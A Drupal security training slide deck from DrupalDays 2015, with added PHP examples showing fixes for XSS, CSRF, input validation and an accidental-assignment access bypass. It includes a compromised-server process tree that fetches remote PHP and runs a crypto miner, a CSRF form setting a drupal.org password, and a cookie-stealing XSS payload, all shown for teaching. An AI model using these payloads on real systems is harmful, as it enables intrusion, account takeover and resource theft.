© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal
From start to finish
Speaker Info
Boy Baukema
Security Specialist
boy@ibuildings.nl
@relaxnow
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
A Security what?
/usr/sbin/apache2 -k start
 \_ /usr/sbin/apache2 -k start
     \_ /usr/local/php539/bin/php-cgi -dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -dallow_url_include=on
         \_ sh -c /tmp/sh.sh
             \_ ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker16 -p x

Process tree of a compromised web server: php-cgi was started with -d overrides that prepend a file fetched from a remote URL and switch allow_url_include on, so attacker-supplied PHP runs under the web server account, drops /tmp/sh.sh and launches a scrypt miner pointed at a mining pool.
Such hacked. Much coins.
[20:51:04] root@bal-XXXX.prod:/var/log/nginx#
zgrep "POST / HTTP/1.1" access.log | egrep -o 'forwarded_for="[^[:space:],"]+' | cut -d'"' -f2 | sort | uniq -c | sort -nr | head -30
   2112 104.130.25.XXX
   1144 37.221.162.XXX
   1067 185.13.37.XXX
   1066 77.247.181.XXX
   1058 77.109.141.XXX
   1047 5.135.158.XXX
   1042 178.175.139.XXX

The bracket expression stops at whitespace, commas and quotes, so only the first address of a comma-separated X-Forwarded-For chain is counted. Counting on forwarded_for is only meaningful when your own load balancer sets that header; otherwise the client controls its content.
HTTP Flood
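The same count as the zgrep pipeline above, as an added example in PHP that is not part of the talk. It runs over a few constructed nginx access-log lines using the same key=value style forwarded_for field; the log format, the addresses and the alert threshold are all assumptions made for the illustration. Unlike the shell one-liner it drops "-" and anything that is not an IP literal, and it keeps the per-address table so a threshold can be applied.

```php
<?php
// Added example (not from the talk): count "POST /" requests per forwarded client
// address, as the zgrep pipeline does, over constructed log lines.
// Assumed format: nginx access log with a forwarded_for="..." field.

// Constructed sample lines; addresses, timestamps and paths are invented.
$sample_log = <<<'LOG'
10.0.0.5 - - [12/Mar/2015:20:51:01 +0100] "POST / HTTP/1.1" 200 5123 forwarded_for="104.130.25.17" ua="Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:20:51:01 +0100] "POST / HTTP/1.1" 200 5123 forwarded_for="104.130.25.17" ua="Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:20:51:02 +0100] "POST / HTTP/1.1" 200 5123 forwarded_for="104.130.25.17, 10.0.0.1" ua="Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:20:51:02 +0100] "GET /node/1 HTTP/1.1" 200 812 forwarded_for="37.221.162.9" ua="Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:20:51:03 +0100] "POST / HTTP/1.1" 200 5123 forwarded_for="37.221.162.9" ua="curl/7.38"
10.0.0.5 - - [12/Mar/2015:20:51:03 +0100] "POST /user/login HTTP/1.1" 302 0 forwarded_for="-" ua="Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:20:51:04 +0100] "POST / HTTP/1.1" 200 5123 forwarded_for="not-an-ip" ua="Mozilla/5.0"
LOG;

/**
 * Count "POST /" requests per first forwarded-for address.
 *
 * @return array address => hits, highest first.
 */
function count_post_flood($log) {
  $counts = array();
  foreach (explode("\n", $log) as $line) {
    // Only front-page POSTs, exactly like the zgrep above.
    if (strpos($line, '"POST / HTTP/1.1"') === FALSE) {
      continue;
    }
    // First address in the chain: stop at whitespace, comma or quote.
    if (!preg_match('/forwarded_for="([^\s,"]+)/', $line, $m)) {
      continue;
    }
    $ip = $m[1];
    // The header is client-supplied unless your own proxy overwrites it:
    // drop "-" and anything that is not an IP literal before counting.
    if (filter_var($ip, FILTER_VALIDATE_IP) === FALSE) {
      continue;
    }
    $counts[$ip] = isset($counts[$ip]) ? $counts[$ip] + 1 : 1;
  }
  arsort($counts);
  return $counts;
}

/**
 * Addresses whose hit count reaches $threshold (assumed value, tune per site).
 */
function flood_sources(array $counts, $threshold) {
  return array_keys(array_filter($counts, function ($n) use ($threshold) {
    return $n >= $threshold;
  }));
}

$counts = count_post_flood($sample_log);
foreach (flood_sources($counts, 3) as $ip) {
  printf("%6d %s\n", $counts[$ip], $ip);
}
```

On the constructed input only 104.130.25.17 reaches the threshold; the "-" and "not-an-ip" lines are discarded rather than counted as sources.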
• Drupal Top 3

• Secure Development Lifecycle

• The Law
The Plan
// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
  $new_keys = array();
  foreach ($data as $i => $value) {
    // This assumes that there are no other placeholders that use the same
    // name. For example, if the array placeholder is defined as :example
    // and there is already an :example_2 placeholder, this will generate
/includes/database/database.inc
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf
/**
 * Preprocess function to replace the regular label with the
 * display label
 */
function field_display_label_preprocess_field(&$variables) {
  $field = field_info_instance(...);
  if (
    isset($field['display_label']) &&
    strlen(trim($field['display_label'])) > 0
  ) {
    // display_label is site-builder input and reaches the template unescaped.
    $variables['label'] = $field['display_label'];
  }
}
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content?
Use t('@') syntax!
$text = t(
  "@name's blog",
  [ '@name' => format_username($account) ]
);
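The XSS slide and the placeholder quiz above, worked through as an added example that is not code from the talk or from the field_display_label module. The check_plain() and format_string() shims follow their Drupal 7 definitions (htmlspecialchars with ENT_QUOTES, and @/%/! placeholder handling) so the block runs on plain PHP as well as inside Drupal, where the real functions are used instead; the field instance, the label and the user name are constructed attacker-style inputs.

```php
<?php
// Added example (not the module's code). Shims follow the Drupal 7 definitions so the
// block runs standalone; inside Drupal the real functions win.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}
if (!function_exists('format_string')) {
  // @var is escaped, %var is escaped and wrapped as a placeholder, !var is inserted raw.
  function format_string($string, array $args = array()) {
    foreach ($args as $key => $value) {
      switch ($key[0]) {
        case '@':
          $args[$key] = check_plain($value);
          break;
        case '%':
        default:
          $args[$key] = '<em class="placeholder">' . check_plain($value) . '</em>';
          break;
        case '!':
          // Raw: the caller vouches that $value is already safe HTML.
      }
    }
    return strtr($string, $args);
  }
}

// Constructed field instance; 'display_label' is whatever a site builder typed.
$instance = array('display_label' => '<img src=x onerror=alert(document.cookie)>');

// Vulnerable: the label is handed to the template as-is and field.tpl.php prints it raw.
function label_vulnerable(array $instance) {
  return $instance['display_label'];
}

// Fixed: encode output as late as possible, in the preprocess function that sets it.
function label_fixed(array $instance) {
  if (isset($instance['display_label']) && strlen(trim($instance['display_label'])) > 0) {
    return check_plain($instance['display_label']);
  }
  return NULL;
}

// Placeholders: the format string is a constant, user data goes through @ (escaped).
// format_username() in Drupal 7 returns the unsanitized name, so @ is the right choice.
$username = 'Mallory <script>alert(1)</script>';
$safe   = format_string("@name's blog", array('@name' => $username));
$unsafe = format_string("!name's blog", array('!name' => $username)); // raw: never with user data

echo label_vulnerable($instance), "\n";  // markup reaches the browser
echo label_fixed($instance), "\n";       // entity-encoded, displayed as text
echo $safe, "\n";
echo $unsafe, "\n";
```

The answer to the quiz follows from the shim: drupal_set_message(), l() and watchdog() each take a string that is treated as markup or as a format string, so the safe habit is not to check_plain() the whole message but to keep the message constant and push every piece of user data through an @ placeholder.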
Filter Input
As early as possible
$_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv
everything from the database
$form_state (mostly ['input'])
arg()
drupal_get_query_parameters()
drupal_current_script_url()
drupal_detect_baseurl()
request_path()
What is input?
Sanitize:
  $id = (int) arg(1);
  $accountEnabled = (bool) arg(1);
Validate:
  Form validators
  in_array()
  mb_strlen() > 1024
  url_is_external()
  valid_url()
Filter / Sanitize / Validate
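The cast-then-validate pattern from the slide, as an added example that is not code from the talk. arg() is replaced by a constructed path array so it runs outside Drupal; the allowed status values, the 1024-character limit and the internal-destination check (a plain-PHP stand-in for url_is_external(), not Drupal's implementation) are assumptions made for the illustration. It also shows the edge cases a cast alone does not cover.

```php
<?php
// Added example (not from the talk). Casts never throw, so (int)/(bool) always yield
// the right type, but (int) "42 OR 1=1" is 42, (int) "abc" is 0, (bool) "0" is FALSE
// and (bool) "false" is TRUE: validate the value after sanitizing its type.

// Sanitize then validate a node id taken from the path (stand-in for arg(1)).
function load_node_id(array $path) {
  $id = isset($path[1]) ? (int) $path[1] : 0;
  // A node id is a positive integer and nothing else: "42 OR 1=1" is rejected
  // because its canonical form "42" does not round-trip to the raw input.
  if ($id <= 0 || (string) $id !== (string) $path[1]) {
    return NULL;
  }
  return $id;
}

// Whitelist an enumerated value; the third argument makes in_array() strict so
// "0" does not match an integer entry and an array never matches a string.
function validate_status($raw, array $allowed = array('draft', 'published')) {
  return is_string($raw) && in_array($raw, $allowed, TRUE) ? $raw : NULL;
}

// Length in characters (mb_strlen), not bytes, so multibyte input is neither
// rejected too early nor truncated mid-character by a later byte-length check.
function validate_title($raw, $max = 1024) {
  if (!is_string($raw) || $raw === '' || mb_strlen($raw, 'UTF-8') > $max) {
    return NULL;
  }
  return $raw;
}

// Internal redirect targets only: no scheme, no host, no "//" or "\\" prefix that a
// browser would treat as protocol-relative. Assumed stand-in for url_is_external().
function validate_internal_destination($raw) {
  if (!is_string($raw) || $raw === '' || preg_match('#^[/\\\\]{2}#', $raw)) {
    return NULL;
  }
  $parts = parse_url($raw);
  if ($parts === FALSE || isset($parts['scheme']) || isset($parts['host'])) {
    return NULL;
  }
  return $raw;
}

// Constructed inputs, including the shapes an attacker would try.
var_dump(load_node_id(array('node', '42')));                     // plain id
var_dump(load_node_id(array('node', '42 OR 1=1')));              // injection attempt
var_dump(validate_status('published'));                          // whitelisted
var_dump(validate_status(array('published')));                   // array instead of string
var_dump(validate_title(str_repeat('é', 1024)));                 // 1024 chars, 2048 bytes
var_dump(validate_internal_destination('/user/1/edit'));         // internal path
var_dump(validate_internal_destination('//evil.example/'));      // protocol-relative
var_dump(validate_internal_destination('http://evil.example/')); // absolute
```

The round-trip test in load_node_id() is the part the cast does not give you: (int) silently keeps the leading digits of anything, so comparing the canonical string back to the raw input is what actually rejects the tampered value.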
Encode Output
As late as possible
// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,
2. Access Bypass
global $user;
if ($user->uid = 1) {
  watchdog('mymodule', request_uri());
}
A disturbance in the force
• IDE / code sniffer (coder tools)
• if (1 = $uid)
• === instead of ==
• user_uid_optional_load($uid = NULL)
Avoiding accidental assign
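The slip from the previous slide run to its conclusion, as an added example that is not code from the talk. A constructed anonymous user stands in for the global $user, and the watchdog() calls are replaced by returning the message that would have been logged so the block runs without Drupal; the function names and the request URI are assumptions.

```php
<?php
// Added example (not from the talk). "if ($user->uid = 1)" is not just a logic slip:
// the branch runs for every visitor and the user object is promoted to uid 1, the
// superuser, for the rest of the request.

// Constructed stand-in for the global $user of an anonymous visitor.
$anonymous = (object) array('uid' => 0, 'name' => '');

// Buggy: "=" assigns 1 to uid; the assignment expression evaluates to 1 (truthy),
// so the body always runs and uid is 1 afterwards.
function log_superuser_buggy(stdClass $user, $uri) {
  $message = NULL;
  if ($user->uid = 1) {
    $message = 'Superuser visited ' . $uri;
  }
  return array('logged' => $message, 'uid_after' => $user->uid);
}

// Fixed: strict comparison with the constant on the left, so an accidental "="
// is a parse error instead of a silent assignment. The cast matters because a uid
// loaded from the database may arrive as the string "1", which 1 === "1" rejects.
function log_superuser_fixed(stdClass $user, $uri) {
  $message = NULL;
  if (1 === (int) $user->uid) {
    // The URI is request input: keep it out of the message string and hand it over
    // as an @placeholder, as watchdog('mymodule', 'Superuser visited @uri',
    // array('@uri' => $uri)) would, so it is escaped when the log is displayed.
    $message = array('Superuser visited @uri', array('@uri' => $uri));
  }
  return array('logged' => $message, 'uid_after' => $user->uid);
}

// Objects are passed by handle in PHP, so clone to observe the mutation per call.
print_r(log_superuser_buggy(clone $anonymous, '/admin/config'));
print_r(log_superuser_fixed(clone $anonymous, '/admin/config'));
```

Drupal's coder/phpcs rules flag the assignment-in-condition, which is why the slide lists the sniffer first; the literal-first form is the habit that makes the same mistake fail at compile time when no sniffer runs.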
<form action="http://mysite.com/contact" method="post" />
3. Cross Site Request Forgery
<form action="https://www.drupal.org/user/2457520/edit" method="post">
  <input type="hidden" name="pass[pass1]" value="hacked1" />
</form>
3. Cross Site Request Forgery
<script>
  $('#contactform').submit();
</script>
3. Cross Site Request Forgery
=> drupal_get_token
<= drupal_valid_token
Drupal Forms to the rescue!
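Drupal's Form API adds and checks form_token for you; the same drupal_get_token()/drupal_valid_token() pattern protects a custom action outside the Form API, for instance a "delete" link handled by a menu callback. The block below is an added example, not code from the talk or from Drupal core: the HMAC construction mirrors drupal_hmac_base64() (HMAC-SHA256, URL-safe base64), but the session id, private key and hash salt are constructed values that in Drupal come from session_id(), drupal_get_private_key() and drupal_get_hash_salt(), and the action path and function names are assumptions.

```php
<?php
// Added example (not from the talk): a CSRF token bound to the user's session and
// to the action it authorizes, generated when the link is rendered and checked
// before the action runs. Constructed values stand in for Drupal's session/key/salt.
$session_id  = 'sess_3f9a1c';        // per user, from session_id() in Drupal
$private_key = 'site-private-key';   // per site, drupal_get_private_key()
$hash_salt   = 'site-hash-salt';     // per site, drupal_get_hash_salt()

// Same shape as Drupal 7's drupal_hmac_base64(): HMAC-SHA256, base64 made URL-safe.
function hmac_base64($data, $key) {
  $hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));
  return strtr($hmac, array('+' => '-', '/' => '_', '=' => ''));
}

// Token for this session and this value; another user or another action gets a
// different token, so a forged cross-site request cannot carry a valid one.
function get_token($value, $session_id, $private_key, $hash_salt) {
  return hmac_base64($value, $session_id . $private_key . $hash_salt);
}

// Constant-time comparison; Drupal 7 compared with a plain ==, hash_equals() is safer.
function valid_token($token, $value, $session_id, $private_key, $hash_salt) {
  return hash_equals(get_token($value, $session_id, $private_key, $hash_salt), (string) $token);
}

// Rendering the link: the token is tied to "delete node 17" and nothing else.
$action = 'node/17/delete';
$link = '/' . $action . '?token=' . get_token($action, $session_id, $private_key, $hash_salt);

// Handling the request: reject a missing or wrong token before doing anything.
function handle_delete($action, array $query, $session_id, $private_key, $hash_salt) {
  if (!isset($query['token']) || !valid_token($query['token'], $action, $session_id, $private_key, $hash_salt)) {
    return '403 Forbidden: bad or missing token';
  }
  return 'deleted ' . $action;
}

parse_str(parse_url($link, PHP_URL_QUERY), $query);
// Legitimate click from the page that rendered the link.
echo handle_delete($action, $query, $session_id, $private_key, $hash_salt), "\n";
// A request forged from another site cannot know this user's session-bound token.
echo handle_delete($action, array('token' => 'guess'), $session_id, $private_key, $hash_salt), "\n";
// A token minted for one action is not valid for another.
echo handle_delete('node/18/delete', $query, $session_id, $private_key, $hash_salt), "\n";
```

The check is independent of the HTTP method: the forged forms on the previous slides would be rejected in exactly the same way, because the attacker's page can submit a POST to your site but cannot read or compute the victim's token.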
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
4. Others
1. Education & Guidance
• Threat Assessment

• Security Requirements

2. Design time security
• Architecture Review

• Code Review
3. Security Review
4. Security Testing
The OWASP Application Security
Verification Standard (ASVS) Project
provides a basis for testing web
application technical security
controls.
• Identify third-party dependencies
• ... follow their security mailing lists
• Make rebuilding painless.
• Make redeploying painless.
• Back up, and restore from backup, 'regularly'
5. Vulnerability Management
The Law
The penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment of up to two years).
For damages, the manager has the burden of proving that he took every possible step to avoid the damage, with reference to appropriate, known techniques of computer security, while the victim only has to prove that damage occurred.
Misure minime di sicurezza (minimum security measures)
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Disciplinare tecnico (technical regulation)
Bob's Story
Responsible Disclosure
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
In summary
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS
The End
